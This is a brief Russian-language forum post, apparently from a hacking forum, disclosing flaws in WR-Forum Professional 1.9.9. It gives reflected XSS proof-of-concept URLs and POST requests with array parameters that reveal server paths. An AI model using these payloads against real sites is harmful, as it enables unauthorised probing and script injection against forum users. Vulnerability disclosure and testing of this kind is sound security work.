Форум АНТИЧАТ - Уязвимости в WR-Forum Professional 1.9.9

Представляю отчёт об уязвимостях, найденных мною в WR-Forum Professional 1.9.9

.1.Пассивная XSS

http://site.com/talk/pm.php?readpm&id=usver' onmouseover=prompt(/XSS/) bad='

http://site.com/talk/index.php/'onmouseover='prompt(/XSS/)'bad='

http://i.imgur.com/2Rj3Nir.png

.2.Раскрытие путей

.2.1http://site.com/talk/tools.php?event=reg2

POSTDATA

email[]=sample@email.tst&name[]=Myl33tNickName&pass=Myl33tPWD&pol=bla bla bla&stime=Myl33tNum&usernum[]=Myl33tNum&xkey=Myl33tNum

.2.2http://site.com/talk/tools.php?find&event=go

POSTDATA

findme[]=the&ftype=0&gdefinder=1&withregistr=on

.2.3http://site.com/talk/tools.php?event=givmepassword

POSTDATA

myemail[]=sample%40email.tst&myname[]=Myl33tNickName

.2.4http://site.com/talk/tools.php?event=regenter

POSTDATA

name[]=Myl33tNickName&pass[]=Myl33tPWD

Как-то так. Возможно в тему будет что нибудь добавляться.